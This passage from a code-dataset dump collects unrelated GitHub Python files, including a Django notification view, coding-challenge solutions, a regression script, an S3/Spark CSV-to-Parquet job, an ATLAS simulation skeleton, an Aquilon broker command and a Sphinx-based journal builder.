id=int(to_do)\n Notification.objects.filter(id=id).mark_all_as_deleted()\n except:\n pass\n\n def get(self, request, *args, **kwargs):\n self.update_to_do()\n self.set_obj_breadcrumbs({'url': 'notice/read/', 'title': \"已读消息\"})\n objects = self.user.notifications.read().exclude(status=\"待发送\").prefetch_related('nfrom').myprefetch_related('actor','target')\n self.set_page_obj(objects)\n context = self.context\n context[\"type\"]='已读通知'\n return self.template_response('xadmin/views/messages_read.html', context)\n\nxadmin.site.register_view(r'notice/read/$', ReadView,name='read')","repo_name":"htyangya/scwork","sub_path":"common/views/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42605830208","text":"def isHappy(n):\r\n while n != 1:\r\n n=sum([int(i)**2 for i in str(n)])\r\n if n==4:\r\n return False\r\n return True\r\n#print(isHappy(19))\r\n\r\ndef fizzBuzz(n):\r\n return ['FizzBuzz' if i%15==0 else 'Buzz' if i%5==0 else 'Fizz' if i%3==0 else str(i) for i in range(1,n+1)]\r\n#print(fizzBuzz(5))\r\n\r\ndef truncateSentence(s,k):\r\n words=s.split(\" \")\r\n return \" \".join(words[0:k])\r\n#print(truncateSentence(\"Hello how are you Contestant\",4))\r\n\r\ndef solution(words):\r\n codes={\"a\": \".-\", \"b\": \"-...\", \"c\": \"-.-.\", \"d\": \"-..\", \"e\": \".\", \"f\": \"..-.\", \"g\": \"--.\", \"h\": \"....\", \"i\": \"..\",\r\n \"j\": \".---\", \"k\": \"-.-\", \"l\": \".-..\", \"m\": \"--\", \"n\": \"-.\", \"o\": \"---\", \"p\": \".--.\", \"q\": \"--.-\",\r\n \"r\": \".-.\", \"s\": \"...\", \"t\": \"-\", \"u\": \"..-\", \"v\": \"...-\", \"w\": \".--\", \"x\": \"-..-\", \"y\": \"-.--\", \"z\": \"--..\"}\r\n res=set()\r\n for word in words:\r\n m=[]\r\n for ch in word:\r\n m.append(codes.get(ch))\r\n res.add(\"\".join(m))\r\n return len(res)\r\n\r\n\r\n\r\n","repo_name":"hyewon0214/hyewon","sub_path":"0625.py","file_name":"0625.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33451526118","text":"class Solution:\n def arrayChange(self, nums: List[int], operations: List[List[int]]) -> List[int]:\n num_index = {}\n for index in range(len(nums)):\n num_index[nums[index]] = index\n for old,new in operations:\n index = num_index[old]\n nums[index] = new\n num_index[new] = num_index.pop(old)\n return nums\n \n \n \n \n ","repo_name":"yonasengdu/Compitative-programming","sub_path":"2295-replace-elements-in-an-array/2295-replace-elements-in-an-array.py","file_name":"2295-replace-elements-in-an-array.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39181559738","text":"#https://www.hackerrank.com/challenges/python-print/problem?h_r=next-challenge&h_v=zen&h_r=next-challenge&h_v=zen\n\"\"\"The included code stub will read an integer,n, from STDIN.\n\nWithout using any string methods, try to print the following:\n\n\nNote that \"\" represents the consecutive values in between.\n\nExample\nn=5\nPrint the string 12345\"\"\"\n\nn = int(input(\"enter a number\"))\na=[]\nif n>=1 and n<=150:\n for i in range(1,n+1):\n a.append(str(i))\n print(''.join(a))","repo_name":"prasoons075/Python_Learning","sub_path":"HackerRank/02.print_function.py","file_name":"02.print_function.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72314020993","text":"# Importing the libraries\r\nimport pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('student_scores1.csv') \r\n#moving column 1 to x\r\nX = dataset.iloc[:,:-1].values \r\n#moving column 2 to y\r\ny = dataset.iloc[:, 1].values \r\n\r\n\r\n#dataset.shape \r\n \r\n#dataset.keys()\r\n\r\n# Taking care of missing data\r\nfrom sklearn.preprocessing import Imputer\r\n#replacing missing with mean\r\nimputer = Imputer(missing_values = 'NaN', strategy = 'mean', axis = 0)\r\nimputer = imputer.fit(X[:, 0:1])\r\n#transfering imputed values back to X\r\nX[:,0:1] = imputer.transform(X[:,0:1])\r\n\r\n# Splitting the dataset into the Training set and Test set\r\nfrom sklearn.model_selection import train_test_split \r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0) \r\n\r\nfrom sklearn.linear_model import LinearRegression \r\n#creating regressor object of linear regression\r\nregressor = LinearRegression() \r\nregressor.fit(X_train, y_train)\r\n\r\n\r\ny_pred = regressor.predict(X_test)\r\n\r\n\r\nfrom sklearn import metrics \r\n#print('Mean Absolute Error:', metrics.mean_absolute_error(y_test, y_pred)) \r\nprint('Mean Squared Error:', metrics.mean_squared_error(y_test, y_pred)) \r\n#print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test, y_pred))) \r\n\r\n#plt.scatter(X_train, y_train, color = 'red')\r\n#plt.plot(X_train, regressor.predict(X_train), color = 'blue')\r\n#plt.title('Hours vs Percentage') \r\n#plt.xlabel('Hours Studied') \r\n#plt.ylabel('Percentage Score') \r\n#plt.show()\r\n\r\n\r\nplt.scatter(X_test, y_test, color = 'red')\r\n#plt.plot(X_test, y_test, color = 'blue')\r\nplt.plot(X_test, regressor.predict(X_test), color = 'blue')\r\nplt.title('Hours vs Percentage') \r\nplt.xlabel('Hours Studied') \r\nplt.ylabel('Percentage Score') \r\nplt.show()","repo_name":"haseena-hassan/Machine-Learning","sub_path":"Linear & Logistic regression/student_scores.py","file_name":"student_scores.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27015929829","text":"import book_fun\r\nimport os\r\nbook_fun.print_options()\r\noption = input()\r\nbooks=[]\r\nwhile option!='X' and option !='x':\r\n if option =='1':\r\n books.append(book_fun.create_book())\r\n book_fun.create_book()\r\n input(\"command executed... press any button to continue\")\r\n elif option=='2':\r\n book_fun.save_book(books)\r\n elif option=='3':\r\n books=book_fun.load_books()\r\n elif option=='4':\r\n book_fun.find_book(books,\"12\")\r\n elif option=='5':\r\n book_fun.issue_book(books)\r\n elif option=='6':\r\n book_fun.return_book(books)\r\n else:\r\n print(\"the given command doesn't exsits\")\r\n input(\"press enter to continuee....\")\r\n os.system(\"cls\")\r\n book_fun.print_options()\r\n option=input()\r\n","repo_name":"aasthagupt/Library_management_system","sub_path":"lib manage/book_1.py","file_name":"book_1.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34747509003","text":"# Name Printing Checkerboard pattern\n\"\"\"\nCreated on Mon Jun 3 17:38:36 2019\n\n@author: Himanshu Rathore\n\"\"\"\ntotal_lines = int(input(\"Enter total no. lines you want in checker >\"))\n# Take counter for number of lines\ncounter = 1\nwhile (counter <= total_lines):\n # selects line on even number\n if counter%2==0:\n print(\" *\" * 8)\n # selects line on odd number\n else:\n print(\"* \" * 8)\n counter+=1","repo_name":"himanshu2922t/FSDP_2019","sub_path":"DAY-01/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29887429574","text":"import pandas as pd\n\nYES = 'Y'\nNO = 'N'\n\nEditorChoices = (\n (YES, 'Yes'),\n (NO, 'No'),\n)\n\n\ndef populate_data_from_csv(csv_file_path='./main_app/games_data.csv'):\n from main_app.models import GameGenre, GamePlatform, Game\n dataframe = pd.read_csv(csv_file_path)\n print(\"populating\", len(dataframe), \"records\")\n for i in range(len(dataframe)):\n print(\"record no\", i)\n title = dataframe.iloc[i].title\n platform_name = dataframe.iloc[i].platform\n score = dataframe.iloc[i].score\n genre_name = dataframe.iloc[i].genre\n editors_choice = dataframe.iloc[i].editors_choice\n\n genre = GameGenre.objects.get_or_create(name=genre_name)[0]\n platform = GamePlatform.objects.get_or_create(name=platform_name)[0]\n\n Game.objects.get_or_create(title=title, platform=platform, score=score, genre=genre,\n editors_choice=editors_choice)\n","repo_name":"nimishbansal/cgipython","sub_path":"main_app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24565498480","text":"import socket\nfrom urllib.request import urlopen, URLError, HTTPError\nimport time\nsocket.setdefaulttimeout( 1 ) # timeout in seconds\nurl = 'http://myELB-1089638098.ap-south-1.elb.amazonaws.com'\n\nwhile(1):\n try :\n response = urlopen( url )\n except HTTPError as e:\n print ('The server couldn\\'t fulfill the request. Reason:', str(e.code))\n except URLError as e:\n print ('We failed to reach a server. Reason:', str(e.reason))\n \"\"\"else :\n html = response.read()\"\"\"\n time.sleep(0.5)","repo_name":"rajeshk97/AWS_AutoScaling_Implementation","sub_path":"ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71105193153","text":"import sys\nfrom PyJobTransforms.CommonRunArgsToFlags import commonRunArgsToFlags\nfrom PyJobTransforms.TransformUtils import processPreExec, processPreInclude, processPostExec, processPostInclude\nfrom SimuJobTransforms.CommonSimulationSteering import CommonSimulationCfg, specialConfigPreInclude, specialConfigPostInclude\n\n# temporarily force no global config flags\nfrom AthenaConfiguration import AllConfigFlags\ndel AllConfigFlags.ConfigFlags\n\n\ndef fromRunArgs(runArgs):\n from AthenaCommon.Logging import logging\n log = logging.getLogger('Sim_tf')\n log.info('****************** STARTING Simulation *****************')\n\n log.info('**** Transformation run arguments')\n log.info(str(runArgs))\n\n log.info('**** Setting-up configuration flags')\n from AthenaConfiguration.AllConfigFlags import initConfigFlags\n from SimulationConfig.SimEnums import SimulationFlavour\n flags = initConfigFlags()\n\n commonRunArgsToFlags(runArgs, flags)\n\n # Set ProductionStep\n from AthenaConfiguration.Enums import ProductionStep\n flags.Common.ProductionStep = ProductionStep.Simulation\n\n # Set the simulator\n if hasattr(runArgs, 'simulator'):\n flags.Sim.ISF.Simulator = SimulationFlavour(runArgs.simulator)\n\n # This is ISF and resimulation\n flags.Sim.ISFRun = True\n flags.Sim.ISF.ReSimulation = True\n\n # Generate detector list\n from SimuJobTransforms.SimulationHelpers import getDetectorsFromRunArgs\n detectors = getDetectorsFromRunArgs(flags, runArgs)\n\n if hasattr(runArgs, 'inputHITSFile'):\n flags.Input.Files = runArgs.inputHITSFile\n else:\n log.error('No inputHITSFile provided. Please try using Sim_tf.py instead.')\n raise RuntimeError('No intputHITSFile provided.')\n\n if hasattr(runArgs, 'outputHITS_RSMFile'):\n if runArgs.outputHITS_RSMFile == 'None':\n flags.Output.HITSFileName = ''\n else:\n flags.Output.HITSFileName = runArgs.outputHITS_RSMFile\n\n # Setup detector flags\n from AthenaConfiguration.DetectorConfigFlags import setupDetectorFlags\n setupDetectorFlags(flags, detectors, toggle_geometry=True)\n\n # Setup perfmon flags from runargs\n from PerfMonComps.PerfMonConfigHelpers import setPerfmonFlagsFromRunArgs\n setPerfmonFlagsFromRunArgs(flags, runArgs)\n\n # Pre-include\n processPreInclude(runArgs, flags)\n\n # Special Configuration preInclude\n specialConfigPreInclude(flags)\n\n # Pre-exec\n processPreExec(runArgs, flags)\n\n # Common simulation runtime arguments\n from SimulationConfig.SimConfigFlags import simulationRunArgsToFlags\n simulationRunArgsToFlags(runArgs, flags)\n\n # To respect --athenaopts \n flags.fillFromArgs()\n\n # Lock flags\n flags.lock()\n\n cfg = CommonSimulationCfg(flags, log)\n\n # Add OLD suffix to the names of collections read in from the input HITS file\n from SimuJobTransforms.ReSimInputConfig import RenameHitCollectionsOnReadCfg\n cfg.merge(RenameHitCollectionsOnReadCfg(flags))\n\n # Special Configuration postInclude\n specialConfigPostInclude(flags, cfg)\n\n # Post-include\n processPostInclude(runArgs, flags, cfg)\n\n # Post-exec\n processPostExec(runArgs, flags, cfg)\n\n # Write AMI tag into in-file metadata\n from PyUtils.AMITagHelperConfig import AMITagCfg\n cfg.merge(AMITagCfg(flags, runArgs))\n\n import time\n tic = time.time()\n # Run the final accumulator\n sc = cfg.run()\n log.info(\"Run resimulation in \" + str(time.time()-tic) + \" seconds\")\n\n sys.exit(not sc.isSuccess())\n","repo_name":"Yusuf-Manjra/athena","sub_path":"Simulation/SimuJobTransforms/python/ReSimulation_Skeleton.py","file_name":"ReSimulation_Skeleton.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71303723716","text":"from PIL import Image, ImageEnhance\nimport os\n\nfileDir = os.path.dirname(os.path.realpath(__file__))\nsrcPath = fileDir + \"\\\\barnE.jpg\"\nbarnE = Image.open(srcPath)\n\nprint('Pillow is a plugin that allows python to open images using Image')\nbarnE.show()\n\nprint('Press enter to continue.')\ninput()\n\nprint('It can edit the color of images and apply filters using ImageEnhance')\nbw = ImageEnhance.Color(barnE)\nbw.enhance(0).show(\"Black and White\")\n\nprint('Press enter to continue.')\ninput()\n\nprint('It can also be used to create GIFs')\nr0 = barnE\nr1 = barnE.rotate(45)\nr2 = barnE.rotate(90)\nr3 = barnE.rotate(135)\nr4 = barnE.rotate(180)\nr5 = barnE.rotate(225)\nr6 = barnE.rotate(270)\nr7 = barnE.rotate(315)\n\nspinPath = fileDir + \"\\\\barnSpin.gif\"\nr0.save(spinPath, save_all=True, append_images=[r1, r2, r3, r4, r5, r6, r7], duration = 50, loop = 0)\nspin = Image.open(spinPath)\n\nprint('GIFs will only open as still images when opened through PIL')\nprint('All of their frames will be accessible, however')\nprint('A GIF was just saved in the same directory this script is in')\nprint('To test, we can use [name].is_animated: ' + str(spin.is_animated))\nprint('We can also see how many frames it has, this one has ' + str(spin.n_frames))","repo_name":"vandewar/it3038c-scripts","sub_path":"python/Lab7/Lab7.py","file_name":"Lab7.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71076757314","text":"\"\"\"\nScrie un program care primește o listă de șiruri de caractere ca intrare. Programul ar trebui să afișeze fiecare șir\nde caractere pe o linie separată. Cu toate acestea, dacă un șir de caractere începe cu litera 'A', programul ar\ntrebui să sara peste acel șir și să treacă la următorul folosind instrucțiunea continue.\n\"\"\"\n# Solution\nlista_cuvinte = input(\"Introdu numere separate prin virgula:\\n\").split(\", \")\nfor str in lista_cuvinte:\n if str[0].upper() == 'A':\n continue\n print(str)\n# solution with while\ni = 0\nwhile i < len(lista_cuvinte):\n if lista_cuvinte[i][0].upper() == 'A':\n i += 1\n continue\n print(lista_cuvinte[i])\n i += 1\n","repo_name":"dabija1989/Learning_python_100_days_coding","sub_path":"home_work 8/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71151256194","text":"print('Задача 1. Сумма чисел')\n\ndef summa_n(N):\n summa = 0\n for i in range(1,N+1):\n summa+=i\n print(f\"Я знаю, что сумма чисел от 1 до {N} равна {summa}\")\n\nN = int(input(\"Введите число \"))\nsumma_n(N)","repo_name":"DefaultPerson/python-learn-guide","sub_path":"python_course/python_course_answers/module_1_2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"70981032195","text":"import boto3\nfrom botocore.exceptions import ClientError\nfrom pyspark.sql import SparkSession\n\n# Crie a sessão Spark\nspark = SparkSession.builder.getOrCreate()\n\n# Caminho do arquivo CSV de entrada\nmovies_csv_file = \"s3://natalias-s3-bucket/Raw/Local/CSV/Movies/2023/04/26/movies.csv\"\n\n# Nome e caminho do bucket de saída\noutput_bucket = \"natalias-s3-bucket\"\noutput_folder = \"Trusted/Parquet/Movies/\"\n\n# Caminho completo para a pasta \"trusted\"\ntrusted_folder = f\"{output_folder}/trusted/\"\n\n# Verifique se a pasta \"trusted\" já existe no bucket de saída\ns3_client = boto3.client(\"s3\")\ntry:\n s3_client.head_object(Bucket=output_bucket, Key=f\"{trusted_folder}dummy-file\")\nexcept ClientError:\n # A pasta \"trusted\" não existe, então crie-a\n s3_client.put_object(Bucket=output_bucket, Key=f\"{trusted_folder}dummy-file\")\n\n# Leia os dados CSV inferindo o esquema automaticamente\nmovies_read = spark.read.option(\"header\", True).option(\"sep\", \"|\").option(\"inferSchema\", True).csv(movies_csv_file)\n\n# Escreva os dados como Parquet no bucket de saída\nmovies_read.coalesce(1).write.mode(\"overwrite\").parquet(f\"s3://{output_bucket}/{movies_parquet_path}\")\n","repo_name":"nataliasguimaraes/movie_analysis","sub_path":"trusted/tentativas_trusted/trusted.py","file_name":"trusted.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16151649356","text":"### For\r\nlst=[1,2,3,4,5,6]\r\nfor ele in lst:\r\n print(ele**2)\r\n\r\n### Range: printing the multiples of 2\r\nfor i in range(2,10,2):\r\n print(i)\r\n\r\n### Enumerate\r\nl1 = [\"January\",\"February\",\"March\"]\r\ns1 = \"Olive\"\r\n \r\n# creating enumerate objects\r\nobj1 = enumerate(l1)\r\nobj2 = enumerate(s1)\r\n\r\nprint(list(obj1))\r\nprint(list(obj2))\r\n\r\n### List comprehension\r\nobj = [\"Even\" if i%2==0 else \"Odd\" for i in range(1,20,3)]\r\nprint(obj)\r\n\r\n### Generators\r\n #Basic generator functions\r\nimport random\r\n\r\ndef lottery():\r\n for i in range(6):\r\n\r\n yield random.randint(1,15) \r\nfor ele in lottery():\r\n print(\"And the next number is... !\" , ele)\r\n\r\n### LAMBDA\r\nadder = lambda x, y: x + y\r\nprint(adder (1, 2))\r\n\r\n# filter() with lambda() \r\nlst = [i for i in range(2,20)] \r\n \r\nfilter_list = list(filter(lambda x: (x%2 != 0) , lst)) \r\nprint(filter_list)\r\n\r\n# map() with lambda()\r\nlst1 = [i for i in range(6,12)] \r\n \r\nmap_list = list(map(lambda x: x*2, lst1)) \r\nprint(map_list) \r\n\r\n# reduce() with lambda() \r\n\r\n \r\nfrom functools import reduce\r\nlst3 = [5, 8, 10, 20, 50, 100] \r\nmax = reduce(lambda a,b : a if a > b else b, lst3)\r\nprint(max)","repo_name":"saranyasivam98/Training-Projects","sub_path":"for_range_enumerate_generators.py","file_name":"for_range_enumerate_generators.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32272197896","text":"import os\nimport re\n\nfrom aquilon.exceptions_ import IncompleteError, ArgumentError\nfrom aquilon.worker.broker import BrokerCommand # pylint: disable=W0611\nfrom aquilon.worker.dbwrappers.branch import get_branch_and_author\nfrom aquilon.worker.dbwrappers.host import hostname_to_host\nfrom aquilon.worker.templates.host import PlenaryHost\nfrom aquilon.worker.locks import lock_queue, CompileKey\nfrom aquilon.worker.processes import run_git\nfrom aquilon.aqdb.model import Sandbox\nfrom aquilon.worker.formats.branch import AuthoredSandbox\nfrom aquilon.exceptions_ import ProcessException\n\n\ndef validate_branch_commits(dbsource, dbsource_author,\n dbtarget, dbtarget_author, logger, config):\n domainsdir = config.get('broker', 'domainsdir')\n if isinstance(dbsource, Sandbox):\n authored_sandbox = AuthoredSandbox(dbsource, dbsource_author)\n source_path = authored_sandbox.path\n else:\n source_path = os.path.join(domainsdir, dbsource.name)\n\n if isinstance(dbtarget, Sandbox):\n authored_sandbox = AuthoredSandbox(dbtarget, dbtarget_author)\n target_path = authored_sandbox.path\n else:\n target_path = os.path.join(domainsdir, dbtarget.name)\n\n # check if dbsource has anything uncommitted\n git_status = run_git([\"status\", \"--porcelain\"],\n path=source_path,\n logger=logger)\n if git_status:\n raise ArgumentError(\"The source {0:l} contains uncommitted files.\"\n .format(dbsource))\n\n # get latest source commit bit\n dbsource_commit = run_git(['rev-list', '--max-count=1', 'HEAD'],\n path=source_path, logger=logger)\n dbsource_commit = dbsource_commit.rstrip()\n if not dbsource_commit: # pragma: no cover\n raise ArgumentError(\"Unable to retrieve the git commit history from \"\n \"source branch {0:l}.\".format(dbsource))\n\n # make sure all commits in the source have been published.\n # we can check the latest commit bit from the source in template-king\n # any results returned will mean that all commits has been published\n kingdir = config.get(\"broker\", \"kingdir\")\n try:\n found = run_git(['cat-file', '-t', dbsource_commit],\n path=kingdir, logger=logger)\n found = found.strip()\n except ProcessException as pe:\n if pe.code != 128:\n raise\n else:\n found = None\n if found != 'commit':\n raise ArgumentError(\"The source {0:l} latest commit has not been \"\n \"published to template-king yet.\".format(dbsource))\n\n # check if target branch has the latest source commit\n try:\n filterre = re.compile('^' + dbsource_commit + '$')\n found = run_git(['rev-list', 'HEAD'], filterre=filterre,\n path=target_path, logger=logger)\n except ProcessException as pe:\n if pe.code != 128:\n raise\n else:\n found = None\n if not found:\n raise ArgumentError(\"The target {0:l} does not contain the latest \"\n \"commit from source {1:l}.\".format(dbtarget,\n dbsource))\n\n\nclass CommandManageHostname(BrokerCommand):\n\n required_parameters = [\"hostname\"]\n\n def render(self, session, logger, hostname, domain, sandbox, force,\n **arguments):\n (dbbranch, dbauthor) = get_branch_and_author(session, logger,\n domain=domain,\n sandbox=sandbox,\n compel=True)\n\n if hasattr(dbbranch, \"allow_manage\") and not dbbranch.allow_manage:\n raise ArgumentError(\"Managing hosts to {0:l} is not allowed.\"\n .format(dbbranch))\n\n dbhost = hostname_to_host(session, hostname)\n dbsource = dbhost.branch\n dbsource_author = dbhost.sandbox_author\n old_branch = dbhost.branch.name\n\n if dbhost.cluster:\n raise ArgumentError(\"Cluster nodes must be managed at the \"\n \"cluster level; this host is a member of \"\n \"{0}.\".format(dbhost.cluster))\n\n if not force:\n validate_branch_commits(dbsource, dbsource_author,\n dbbranch, dbauthor, logger, self.config)\n\n dbhost.branch = dbbranch\n dbhost.sandbox_author = dbauthor\n session.add(dbhost)\n session.flush()\n plenary_host = PlenaryHost(dbhost, logger=logger)\n\n # We're crossing domains, need to lock everything.\n # XXX: There's a directory per domain. Do we need subdirectories\n # for different authors for a sandbox?\n key = CompileKey(logger=logger)\n\n try:\n lock_queue.acquire(key)\n\n plenary_host.stash()\n plenary_host.cleanup(old_branch, locked=True)\n\n # Now we recreate the plenary to ensure that the domain is ready\n # to compile, however (esp. if there was no existing template), we\n # have to be aware that there might not be enough information yet\n # with which we can create a template\n try:\n plenary_host.write(locked=True)\n except IncompleteError:\n # This template cannot be written, we leave it alone\n # It would be nice to flag the state in the the host?\n pass\n except:\n # This will not restore the cleaned up files. That's OK.\n # They will be recreated as needed.\n plenary_host.restore_stash()\n raise\n finally:\n lock_queue.release(key)\n\n return\n","repo_name":"gombasg/aquilon","sub_path":"lib/python2.6/aquilon/worker/commands/manage_hostname.py","file_name":"manage_hostname.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"1125155896","text":"\"\"\"This module controls building the journal from the entry sources\"\"\"\n\nimport os\nimport sys\nimport webbrowser\n\nfrom pyjournal2 import shell_util\n\n\nclass Entry:\n def __init__(self, topic, year, entry_date_num):\n self.topic = topic\n self.year = int(year)\n self.entry_date_num = entry_date_num\n\n def __str__(self):\n return f\"{self.topic}: {self.entry_date_num}\"\n\ndef get_source_dir(defs):\n \"\"\"return the directory where we put the sources\"\"\"\n return f\"{defs['working_path']}/journal-{defs['nickname']}/source/\"\n\n\ndef get_topics(defs):\n \"\"\"return a list of the currently known topics\"\"\"\n\n source_dir = get_source_dir(defs)\n\n topics = []\n other = []\n\n # get the list of directories in source/ -- these are the topics\n for d in os.listdir(source_dir):\n if os.path.isdir(os.path.join(source_dir, d)) and not d.startswith(\"_\"):\n topics.append(d)\n\n # remove todo -- it will be treated specially\n if \"todo\" in topics:\n topics.remove(\"todo\")\n other.append(\"todo\")\n\n if \"year_review\" in topics:\n topics.remove(\"year_review\")\n other.append(\"year_review\")\n\n return topics, other\n\n\ndef get_topic_entries(topic, defs):\n \"\"\"return a list of Entry objects for all the entries in topic\"\"\"\n\n cwd = os.getcwd()\n\n source_dir = get_source_dir(defs)\n tdir = os.path.join(source_dir, topic)\n\n os.chdir(tdir)\n\n # look over the directories here, they will be in the form YYYY-MM-DD\n entries = []\n\n for d in os.listdir(tdir):\n if os.path.isdir(os.path.join(tdir, d)):\n y, _, _ = d.split(\"-\")\n entries.append(Entry(topic, y, d))\n\n entries.sort(reverse=True, key=lambda e : e.entry_date_num)\n\n os.chdir(cwd)\n\n return entries\n\ndef get_most_recent_entries(topics, defs, *, N=25):\n \"\"\"return the N most recent entries, regardless of topic\"\"\"\n\n entries = []\n for t in topics:\n entries += get_topic_entries(t, defs)\n\n entries.sort(reverse=True, key=lambda e: e.entry_date_num)\n return entries[0:N]\n\ndef get_year_review_entries(defs):\n \"\"\"a year review is a special topic for a single year, this gets\n all of those year entries\n\n \"\"\"\n\n cwd = os.getcwd()\n\n source_dir = get_source_dir(defs)\n tdir = os.path.join(source_dir, \"year_review\")\n\n os.chdir(tdir)\n\n # look over the directories here, they will be in the form YYYY-MM-DD\n entries = []\n for f in os.listdir(tdir):\n if f.endswith(\".rst\") and f != \"years.rst\":\n entries.append(f)\n\n entries.sort(reverse=True)\n\n os.chdir(cwd)\n\n return entries\n\n\ndef create_topic(topic, defs):\n \"\"\"create a new topic directory\"\"\"\n\n source_dir = get_source_dir(defs)\n try:\n os.mkdir(os.path.join(source_dir, topic))\n except OSError:\n sys.exit(\"unable to create a new topic\")\n\n\ndef build(defs, show=0):\n \"\"\"build the journal. This entails writing the TOC files that link to\n the individual entries and then running the Sphinx make command\n\n \"\"\"\n\n source_dir = get_source_dir(defs)\n\n topics, other = get_topics(defs)\n\n latest_entries = get_most_recent_entries(topics, defs)\n\n # for each topic, we want to create a \"topic.rst\" that then has\n # things subdivided by year-month, and that a\n # \"topic-year-month.rst\" that includes the individual entries\n for topic in topics:\n\n entries = get_topic_entries(topic, defs)\n tdir = os.path.join(source_dir, topic)\n os.chdir(tdir)\n\n years = set(q.year for q in entries)\n years = list(years)\n years.sort(reverse=True)\n\n # we need to create ReST files of the form YYYY.rst. These\n # will each then contain the links to the entries for that\n # year\n for y in years:\n y_entries = [q for q in entries if q.year == y]\n\n with open(f\"{y}.rst\", \"w\") as yf:\n yf.write(\"****\\n\")\n yf.write(f\"{y}\\n\")\n yf.write(\"****\\n\\n\")\n\n yf.write(\".. toctree::\\n\")\n yf.write(\" :maxdepth: 2\\n\")\n yf.write(\" :caption: Contents:\\n\\n\")\n\n for entry in y_entries:\n yf.write(f\" {entry.entry_date_num}/{entry.entry_date_num}.rst\\n\")\n\n # now write the topic.rst\n with open(f\"{topic}.rst\", \"w\") as tf:\n tf.write(len(topic)*\"*\" + \"\\n\")\n tf.write(f\"{topic}\\n\")\n tf.write(len(topic)*\"*\" + \"\\n\")\n\n tf.write(\".. toctree::\\n\")\n tf.write(\" :maxdepth: 2\\n\")\n tf.write(\" :caption: Contents:\\n\\n\")\n\n for y in years:\n tf.write(f\" {y}.rst\\n\")\n\n # handle the year review now\n if \"year_review\" in other:\n tdir = os.path.join(source_dir, \"year_review\")\n os.chdir(tdir)\n entries = get_year_review_entries(defs)\n\n with open(\"years.rst\", \"w\") as tf:\n topic = \"year review\"\n tf.write(len(topic)*\"*\" + \"\\n\")\n tf.write(f\"{topic}\\n\")\n tf.write(len(topic)*\"*\" + \"\\n\")\n\n tf.write(\".. toctree::\\n\")\n tf.write(\" :maxdepth: 2\\n\")\n tf.write(\" :caption: Contents:\\n\\n\")\n\n for e in entries:\n tf.write(f\" {e}\\n\")\n\n # handle the most recent\n os.chdir(source_dir)\n with open(\"recent.rst\", \"w\") as tf:\n topic = \"recent entries\"\n tf.write(len(topic)*\"*\" + \"\\n\")\n tf.write(f\"{topic}\\n\")\n tf.write(len(topic)*\"*\" + \"\\n\")\n\n tf.write(\".. toctree::\\n\")\n tf.write(\" :maxdepth: 1\\n\")\n tf.write(\" :caption: Contents:\\n\\n\")\n\n for e in latest_entries:\n tf.write(f\" {e} <{e.topic}/{e.entry_date_num}/{e.entry_date_num}.rst>\\n\")\n\n # now write the index.rst\n os.chdir(source_dir)\n with open(\"index.rst\", \"w\") as mf:\n mf.write(\"Research Journal\\n\")\n mf.write(\"================\\n\\n\")\n\n mf.write(\".. toctree::\\n\")\n mf.write(\" :maxdepth: 1\\n\")\n mf.write(\" :caption: Summaries:\\n\\n\")\n\n mf.write(\" recent.rst\\n\")\n\n if \"todo\" in other:\n mf.write(\" todo/todo.rst\\n\")\n\n if \"year_review\" in other:\n mf.write(\" year_review/years.rst\\n\")\n\n mf.write(\".. toctree::\\n\")\n mf.write(\" :maxdepth: 1\\n\")\n mf.write(\" :caption: Topics:\\n\\n\")\n\n for topic in sorted(topics):\n mf.write(f\" {topic}/{topic}\\n\")\n\n mf.write(\"\\n\")\n mf.write(\"Indices and tables\\n\")\n mf.write(\"==================\\n\\n\")\n mf.write(\"* :ref:`genindex`\\n\")\n mf.write(\"* :ref:`modindex`\\n\")\n mf.write(\"* :ref:`search`\\n\")\n\n # now do the building\n build_dir = \"{}/journal-{}/\".format(defs[\"working_path\"], defs[\"nickname\"])\n os.chdir(build_dir)\n\n _, _, rc = shell_util.run(\"make clean\")\n _, _, rc = 